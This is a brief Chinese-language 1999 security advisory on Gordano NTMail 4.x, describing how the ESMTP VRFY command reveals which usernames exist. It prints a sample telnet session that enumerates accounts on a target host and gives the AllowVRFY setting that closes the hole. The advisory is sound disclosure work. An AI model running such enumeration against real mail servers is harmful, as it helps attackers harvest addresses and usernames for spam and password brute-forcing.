发布日期：1999-11-29
更新日期：1999-12-06

受影响系统：

Gordano NTMail 4.3
- Microsoft Windows NT 4.0
Gordano NTMail 4.2
- Microsoft Windows NT 4.0
Gordano NTMail 4.0
- Microsoft Windows NT 4.0

描述：

---

利用ESMTP的VRFY命令可以收集邮件地址。连接到ESMTP后输入“VRFY 用户名”后返回250（地址存在）或557（地址不存在）。这可以被利用来收集邮件地址或得到用户名后进行暴力破解密码攻击。

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

example:   
telnet victimhost:25   
220 mail.net-shopper.co.uk NTMail (v5.01.0003/AB0000.00.719cfeeb) ready for   
ESMTP transfer   
vrfy usera   
250 usera@victimhost .   
vrfy userb   
557 String does not match anything.

建议：

---

In NTMail 5 的VRFY已经可以关掉.   
  
NTMail 4.x:   
  
选"Support > System Variables" 在菜单中选"AllowVRFY" 变量。把它设成“0”，然后   
选择"Change Value"。

浏览次数：9359
严重程度：0（网友投票）